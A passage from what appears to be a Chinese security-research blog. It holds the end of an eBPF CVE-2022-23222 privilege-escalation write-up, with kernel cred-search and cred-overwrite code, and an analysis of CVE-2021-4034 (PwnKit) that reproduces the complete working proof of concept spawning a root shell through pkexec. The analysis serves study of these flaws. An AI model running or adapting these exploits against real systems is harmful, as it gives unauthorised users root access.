ctx->processes[i] = child;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>之后,各进程依次尝试通过任意读原语,在 array 指针之后 PAGE_SIZE * PAGE_SIZE 大小的内核空间搜索 SCSLSCSL 字符串,来定位进程的 cred 。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">find_cred</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < PAGE_SIZE*PAGE_SIZE ; i++)</span><br><span class="line"> {</span><br><span class="line"> u64 val = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">kaddr_t</span> addr = ctx->array_map + PAGE_SIZE + i*<span class="number">0x8</span>;</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_read(ctx, addr, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p"</span>, addr);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// DEBUGF("addr %p = 0x%016x", addr, val);</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">memcmp</span>(&val, __ID__, <span class="keyword">sizeof</span>(val)) == <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">kaddr_t</span> cred_from_task = addr - <span class="number">0x10</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (arbitrary_read(ctx, cred_from_task + <span class="number">8</span>, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p + 8"</span>, cred_from_task);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (val == <span class="number">0</span> && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p + 0"</span>, cred_from_task);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (val != <span class="number">0</span>) {</span><br><span class="line"> ctx->cred = (<span class="keyword">kaddr_t</span>)val;</span><br><span class="line"> DEBUGF(<span class="string">"task struct ~ %p"</span>, cred_from_task);</span><br><span class="line"> DEBUGF(<span class="string">"cred @ %p"</span>, ctx->cred);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="4-5-实现提权"><a href="#4-5-实现提权" class="headerlink" title="4.5 实现提权"></a>4.5 实现提权</h3><p>定位到进程 cred 后,即可通过任意写原语修改 cred ,实现提权。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">overwrite_cred</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt" target="_blank" rel="noopener">cve-2022-23222-linux-kernel-ebpf-lpe.txt</a></p>
<p><a href="https://www.pentera.io/blog/the-good-bad-and-compromisable-aspects-of-linux-ebpf/" target="_blank" rel="noopener">The Good, Bad and Compromisable Aspects of Linux eBPF - Pentera</a></p>
<p><a href="https://ebpf.io/" target="_blank" rel="noopener">eBPF - Introduction, Tutorials & Community Resources</a></p>
<p><a href="https://www.kernel.org/doc/html/latest/bpf/instruction-set.html" target="_blank" rel="noopener">eBPF Instruction Set — The Linux Kernel documentation</a></p>
<p><a href="https://arthurchiao.art/blog/bpf-advanced-notes-1-zh/" target="_blank" rel="noopener">BPF 进阶笔记(一):BPF 程序(BPF Prog)类型详解:使用场景、函数签名、执行位置及程序示例</a></p>
<p><a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html" target="_blank" rel="noopener">bpf-helpers(7) - Linux manual page</a></p>
<p><a href="https://www.containiq.com/post/libbpf" target="_blank" rel="noopener">Libbpf: A Beginners Guide</a></p>
<p><a href="https://nakryiko.com/posts/libbpf-bootstrap/" target="_blank" rel="noopener">Building BPF applications with libbpf-bootstrap</a></p>
<p><a href="https://nakryiko.com/posts/bpf-ringbuf/" target="_blank" rel="noopener">BPF ring buffer</a></p>
<p><a href="https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md" target="_blank" rel="noopener">bcc/reference_guide.md at master · iovisor/bcc</a></p>
</div>
<footer class="article-footer">
<a data-url="http://yoursite.com/2022/07/04/CVE-2022-23222/" data-id="cmd5slr2i000k0lo1de7s4e8o" class="article-share-link">Share</a>
</footer>
</div>
</article>
<article id="post-2022/02/10/CVE-2021-4034" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2022/02/10/CVE-2021-4034/" class="article-date">
<time datetime="2022-02-14T14:00:00.000Z" itemprop="datePublished">2022-02-14</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2022/02/10/CVE-2021-4034/">CVE-2021-4034 pkexec 本地提权漏洞利用解析</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<h2 id="0x00-作者"><a href="#0x00-作者" class="headerlink" title="0x00 作者"></a>0x00 作者</h2><p>钱程 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a> </p>
<h2 id="0x01-漏洞基本信息"><a href="#0x01-漏洞基本信息" class="headerlink" title="0x01 漏洞基本信息"></a>0x01 漏洞基本信息</h2><p>polkit 的 pkexec 程序中存在一个本地权限提升漏洞。当前版本的 pkexec 无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过控制环境变量来利用这一点,从而诱导 pkexec 执行任意代码。利用成功后,会导致本地特权升级,非特权用户获得管理员权限 </p>
<h3 id="软件简介"><a href="#软件简介" class="headerlink" title="软件简介"></a>软件简介</h3><p><a href="https://gitlab.freedesktop.org/polkit/polkit/" target="_blank" rel="noopener">polkit</a> 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。</p>
<p>Polkit 在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和 sudo 等程序不同,Polkit 并没有赋予进程完全的 root 权限,而是通过一个集中的策略系统进行更精细的授权。</p>
<p>Polkit 定义出一系列操作,例如运行 GParted, 并将用户按照群组或用户名进行划分,例如 wheel 群组用户。然后定义每个操作是否可以由某些用户执行,执行操作前是否需要一些额外的确认,例如通过输入密码确认用户是不是属于某个群组。</p>
<blockquote>
<p>https://wiki.archlinux.org/title/Polkit_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87)</p>
</blockquote>
<h3 id="漏洞原理概括"><a href="#漏洞原理概括" class="headerlink" title="漏洞原理概括"></a>漏洞原理概括</h3><p>当前版本的 pkexec 无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过控制环境变量来利用这一点,从而诱导 pkexec 执行任意代码。</p>
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p>pkexec 是 polkit 的一个程序,可以以其他用户身份执行命令。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜ pkexec --<span class="built_in">help</span></span><br><span class="line">pkexec --version |</span><br><span class="line"> --<span class="built_in">help</span> |</span><br><span class="line"> --<span class="built_in">disable</span>-internal-agent |</span><br><span class="line"> [--user username] PROGRAM [ARGUMENTS...]</span><br><span class="line"></span><br><span class="line">See the pkexec manual page <span class="keyword">for</span> more details.</span><br></pre></td></tr></table></figure>
<p>不指定 <code>--user</code> 参数时,缺省为 <code>root</code>。比如:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pkexec reboot</span><br></pre></td></tr></table></figure>
<p><a href="https://imgtu.com/i/7X2MRK" target="_blank" rel="noopener"><img src="https://s4.ax1x.com/2022/01/27/7X2MRK.png" alt="7X2MRK.png"></a></p>
<h3 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h3><p>环境没有特殊要求,主流 Linux 发行版都可以。</p>
<p>本次测试的环境:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">➜ uname -a</span><br><span class="line">Linux ubuntu 5.11.0-46-generic <span class="comment">#51~20.04.1-Ubuntu SMP Fri Jan 7 06:51:40 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux</span></span><br><span class="line">~ </span><br><span class="line">➜ lsb_release -a</span><br><span class="line">No LSB modules are available.</span><br><span class="line">Distributor ID: Ubuntu</span><br><span class="line">Description: Ubuntu 20.04.3 LTS</span><br><span class="line">Release: 20.04</span><br><span class="line">Codename: focal</span><br><span class="line">➜ gcc --version</span><br><span class="line">gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0</span><br><span class="line">Copyright (C) 2019 Free Software Foundation, Inc.</span><br><span class="line">This is free software; see the <span class="built_in">source</span> <span class="keyword">for</span> copying conditions. There is NO</span><br><span class="line">warranty; not even <span class="keyword">for</span> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</span><br><span class="line">➜ pkexec --version</span><br><span class="line">pkexec version 0.105</span><br></pre></td></tr></table></figure>
<h2 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 漏洞分析</h2><p>对该漏洞的分析将结合已知的 <a href="https://github.com/arthepsy/CVE-2021-4034" target="_blank" rel="noopener">POC</a> 和 Qualys 的<a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034" target="_blank" rel="noopener">报告</a>进行。</p>
<h3 id="分析-POC"><a href="#分析-POC" class="headerlink" title="分析 POC"></a>分析 POC</h3><p>先来分析 POC:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"> <span class="number">2</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"> <span class="number">3</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"> <span class="number">4</span> </span><br><span class="line"> <span class="number">5</span> <span class="keyword">char</span> *shell =</span><br><span class="line"> <span class="number">6</span> <span class="string">"#include <stdio.h>\n"</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"#include <stdlib.h>\n"</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"#include <unistd.h>\n\n"</span></span><br><span class="line"> <span class="number">9</span> <span class="string">"void gconv() {}\n"</span></span><br><span class="line"><span class="number">10</span> <span class="string">"void gconv_init() {\n"</span></span><br><span class="line"><span class="number">11</span> <span class="string">" setuid(0); setgid(0);\n"</span></span><br><span class="line"><span class="number">12</span> <span class="string">" seteuid(0); setegid(0);\n"</span></span><br><span class="line"><span class="number">13</span> <span class="string">" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"</span></span><br><span class="line"><span class="number">14</span> <span class="string">" exit(0);\n"</span></span><br><span class="line"><span class="number">15</span> <span class="string">"}"</span>;</span><br><span class="line"><span class="number">16</span> </span><br><span class="line"><span class="number">17</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"><span class="number">18</span> FILE *fp;</span><br><span class="line"><span class="number">19</span> system(<span class="string">"mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"</span>);</span><br><span class="line"><span class="number">20</span> system(<span class="string">"mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"</span>);</span><br><span class="line"><span class="number">21</span> fp = fopen(<span class="string">"pwnkit/pwnkit.c"</span>, <span class="string">"w"</span>);</span><br><span class="line"><span class="number">22</span> <span class="built_in">fprintf</span>(fp, <span class="string">"%s"</span>, shell);</span><br><span class="line"><span class="number">23</span> fclose(fp); </span><br><span class="line"><span class="number">24</span> system(<span class="string">"gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"</span>);</span><br><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br><span class="line"><span class="number">27</span> }</span><br></pre></td></tr></table></figure>
<p>在该 POC 中: </p>
<ol>
<li>L5-L15,即 payload,引入了一个 root 权限的 <code>/bin/sh</code></li>
<li>L19,创建目录 <code>GCONV_PATH=.</code>,创建文件 <code>GCONV_PATH=./pwnkit</code> 并添加了执行权限</li>
<li>L20,创建目录 <code>pwnkit</code>,创建文件 <code>pwnkit/gconv-modules</code> 并写入内容 <code>module UTF-8// PWNKIT// pwnkit 2</code></li>
<li>L21-L24,把 payload 写入 <code>pwnkit/pwnkit.c</code> 并编译为动态链接库 <code>pwnkit/pwnkit.so</code></li>
<li>L25,一个特殊的数组</li>
<li>L26,使用 <code>execve</code> 调用 <code>pkexec</code>,这里有个特别的参数 <code>(char*[]){NULL}</code>,这也是整个 POC 的<strong>启动点</strong></li>
</ol>
<p>测试一下 POC:</p>
<p><a href="https://imgtu.com/i/7X2QxO" target="_blank" rel="noopener"><img src="https://s4.ax1x.com/2022/01/27/7X2QxO.png" alt="7X2QxO.png"></a></p>
<h3 id="奇妙的-argc-为-0"><a href="#奇妙的-argc-为-0" class="headerlink" title="奇妙的 argc 为 0"></a>奇妙的 argc 为 0</h3><p>argc 和 argv 大家都熟悉,为了后面的分析这里再介绍一下:</p>
<ul>
<li>argc:即 argument count,保存运行时传递给 main 函数的参数个数。</li>
<li>argv:即 argument vector,保存运行时传递 main 函数的参数,类型是一个字符指针数组,每个元素是一个字符指针,指向一个命令行参数。<br>例如:</li>
<li>argv[0] 指向程序运行时的全路径名;</li>
<li>argv[1] 指向程序在命令行中执行程序名后的第一个字符串</li>
</ul>
<p>下面的代码就展示了 argc 和 argv 用法:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//t.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"argc:%d\n"</span>,argc);</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<=argc;i++){</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"argv[%d]:%s\n"</span>,i,argv[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">➜ gcc t.c -o t</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./t</span><br><span class="line">argc:<span class="number">1</span></span><br><span class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:(null)</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./t -l</span><br><span class="line">argc:<span class="number">2</span></span><br><span class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:-l</span><br><span class="line">argv[<span class="number">2</span>]:(null)</span><br></pre></td></tr></table></figure>
<h4 id="execve"><a href="#execve" class="headerlink" title="execve()"></a>execve()</h4><p><a href="https://man7.org/linux/man-pages/man2/execve.2.html" target="_blank" rel="noopener">execve()</a> 可以执行程序,使用该函数需要引入 <code>unistd.h</code> 头文件,函数原型:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">execve</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *pathname, <span class="keyword">char</span> *<span class="keyword">const</span> argv[],</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">char</span> *<span class="keyword">const</span> envp[])</span></span>;</span><br></pre></td></tr></table></figure>
<p>我们使用前面的 <code>t.c</code> 来熟悉一下 <code>execve()</code>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//ex.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="keyword">char</span> *args[]={<span class="string">"./t"</span>,<span class="string">"-l"</span>,<span class="literal">NULL</span>};</span><br><span class="line"> <span class="keyword">char</span> *enp[]={<span class="number">0</span>,<span class="literal">NULL</span>};</span><br><span class="line"> execve(<span class="string">"./t"</span>,args,enp);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">➜ vim ex.c</span><br><span class="line">~/t2 took <span class="number">24</span>s </span><br><span class="line">➜ gcc ex.c -o ex</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./ex </span><br><span class="line">argc:<span class="number">2</span></span><br><span class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:-l</span><br><span class="line">argv[<span class="number">2</span>]:(null)</span><br></pre></td></tr></table></figure>
<p>前面 POC 中 L26,使用了 <code>execve()</code>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br></pre></td></tr></table></figure>
<p>但是参数使用方法和我们测试的不同,<strong>第二个参数使用了 <code>(char*[]){NULL}</code> 进行填充</strong>。我们来测试一下这样会有什么结果:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//ex.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="comment">//char *args[]={"./t","-l",NULL};</span></span><br><span class="line"> <span class="keyword">char</span> *enp[]={<span class="number">0</span>,<span class="literal">NULL</span>};</span><br><span class="line"> execve(<span class="string">"./t"</span>,(<span class="keyword">char</span>*[]){<span class="literal">NULL</span>},enp);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">~/t2 </span><br><span class="line">➜ vim ex.c</span><br><span class="line">~/t2 took <span class="number">31</span>s </span><br><span class="line">➜ gcc ex.c -o ex</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./ex </span><br><span class="line">argc:<span class="number">0</span></span><br><span class="line">argv[<span class="number">0</span>]:(null)</span><br></pre></td></tr></table></figure>
<p>此时我们发现 argc 为 0,且 argv[0] 内容为空,不再是程序本身。这有什么用呢?用处很大。</p>
<h3 id="pkexec-中的越界读取"><a href="#pkexec-中的越界读取" class="headerlink" title="pkexec 中的越界读取"></a>pkexec 中的越界读取</h3><p>现在来分析 pkexec 的代码,其 main() 函数主要结构如下:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">435</span> main (<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span><br><span class="line"><span class="number">436</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">534</span> <span class="keyword">for</span> (n = <span class="number">1</span>; n < (guint) argc; n++)</span><br><span class="line"><span class="number">535</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">568</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">610</span> path = g_strdup (argv[n]);</span><br><span class="line">...</span><br><span class="line"><span class="number">629</span> <span class="keyword">if</span> (path[<span class="number">0</span>] != <span class="string">'/'</span>)</span><br><span class="line"><span class="number">630</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">632</span> s = g_find_program_in_path (path);</span><br><span class="line">...</span><br><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line"><span class="number">640</span> }</span><br></pre></td></tr></table></figure>
<p>其中有两个 glib 提供的函数 <a href="https://www.manpagez.com/html/glib/glib-2.56.0/glib-String-Utility-Functions.php#g-strdup" target="_blank" rel="noopener">g_strdup()</a> 和 <a href="https://docs.gtk.org/glib/func.find_program_in_path.html" target="_blank" rel="noopener">g_find_program_in_path()</a> ,先熟悉一下: </p>
<blockquote>
<ul>
<li><code>g_strdup()</code> 复制一个字符串,声明如下:<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gchar *</span><br><span class="line">g_strdup (<span class="keyword">const</span> gchar *str);</span><br></pre></td></tr></table></figure></li>
<li><code>g_find_program_in_path()</code> 在用户路径中定位第一个名为 program 的可执行程序,与 execvp() 定位它的方式相同。返回具有绝对路径名的已分配字符串,如果在路径中找不到程序,则返回 NULL。如果 program 已经是绝对路径,且如果 program 存在并且可执行,则返回 program 的副本,否则返回 NULL。<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gchar*</span><br><span class="line">g_find_program_in_path (</span><br><span class="line"> <span class="keyword">const</span> gchar* program</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
</li>
</ul>
</blockquote>
<p>再看 main() 函数中:</p>
<ul>
<li>L534-L568,用来处理命令行参数<ul>
<li>L534:n=1,当 argc=1 时,不会进入循环,比如:<code>pkexec</code>;当 argc>1时,才会进入循环,比如:<code>pkexec --version</code></li>
</ul>
</li>
<li>L610-L640,如果其路径不是绝对路径,会在 PATH 中搜索要执行的程序<ul>
<li>L610:使用 <code>g_strdup()</code> 复制 <code>argv[n]</code> 的内容到 <code>path</code>,因为在 <code>pkexec</code> 中 <code>argv[n]</code> 就是目标路径,比如:<code>pkexec reboot</code></li>
<li>L629:这里判断是否是绝对路径的方法比较巧妙,使用 <code>path[0] != '/'</code> 来判断</li>
<li>L632:检索目标路径,返回目标路径字符串</li>
